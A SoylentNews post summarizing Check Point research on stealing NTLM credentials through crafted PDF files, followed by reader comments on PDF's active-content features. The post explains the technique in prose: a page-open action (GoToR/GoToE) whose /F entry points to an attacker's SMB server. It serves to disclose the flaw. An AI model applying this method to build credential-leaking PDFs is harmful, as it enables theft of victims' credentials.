Stories
Slash Boxes
Comments

SoylentNews is people

posted by janrinok on Saturday May 05 2018, @01:51AM   Printer-friendly
from the not-the-best-best-explanation dept.

Submitted via IRC for SoyCow8317

NT LAN Manager (NTLM) credentials can be stolen via malicious Portable Document Format (PDF) files without user interaction.

PDF files, the security researchers explain, consist primarily of objects, together with Document structure, File structure, and content streams. There are eight basic types of objects, including dictionaries, and a malicious actor can abuse these to steal NTLM credentials.

A dictionary object represents a table containing pairs of objects, called entries, where the first element is the key (a name) and the second element is the value (may be any kind of object). Represented by dictionary objects, the pages of a document are called page objects and consist of required and optional entries.

One of the optional entries is the /AA entry, defining actions performed when a page is opened (/O entry) or closed (/C entry). An action dictionary is held within /O (/C) and consists of 3 required entries: /S, /F, and /D, describing the type of action to be performed – GoToR (Go To Remote) and GoToE (Go To Embedded) –, the location location [sic] of the other PDF, and the location to go to within the document.

"By injecting a malicious entry (using the fields described above together with his SMB server details via the '/F' key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details," Check Point explains.

Source: https://www.securityweek.com/pdf-files-can-silently-leak-ntlm-credentials


Original Submission

 
This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • (Score: 3, Insightful) by bradley13 on Saturday May 05 2018, @12:08PM (4 children)

    by bradley13 (3053) on Saturday May 05 2018, @12:08PM (#676045) Homepage Journal

    PDF was supposed to be an output format. It never should have introduced any sort of active or executable content.

    --
    Everyone is somebody else's weirdo.
    Starting Score:    1  point
    Moderation   +1  
       Insightful=1, Total=1
    Extra 'Insightful' Modifier   0  
    Karma-Bonus Modifier   +1  

    Total Score:   3  
  • (Score: 0) by Anonymous Coward on Sunday May 06 2018, @12:57AM (2 children)

    by Anonymous Coward on Sunday May 06 2018, @12:57AM (#676214)

    Funny thing! PostScript is turing-complete, and PDF extends PostScript.

    • (Score: 2) by maxwell demon on Sunday May 06 2018, @07:39AM (1 child)

      by maxwell demon (1608) on Sunday May 06 2018, @07:39AM (#676292) Journal

      While Postscript is indeed Turing complete, and PDF was based on Postscript, PDF is not an extension of Postscript. In particular, its graphics language is not Turing complete. Adobe removed precisely those constructs that made PostScript Turing complete (recursion and unbounded loops).

      Of course, later Adobe added JavaScript to the PDF specification, which again is a Turing complete language.

      --
      The Tao of math: The numbers you can count are not the real numbers.
      • (Score: 2) by requerdanos on Sunday May 06 2018, @12:41PM

        by requerdanos (5997) Subscriber Badge on Sunday May 06 2018, @12:41PM (#676346) Journal

        Adobe added JavaScript to the PDF specification

        If that phrase doesn't cause you nightmares as a tech person, perhaps nothing will.

  • (Score: 2) by maxwell demon on Sunday May 06 2018, @07:25AM

    by maxwell demon (1608) on Sunday May 06 2018, @07:25AM (#676288) Journal

    More importantly, it should never cause access of anything other than the document's content.

    --
    The Tao of math: The numbers you can count are not the real numbers.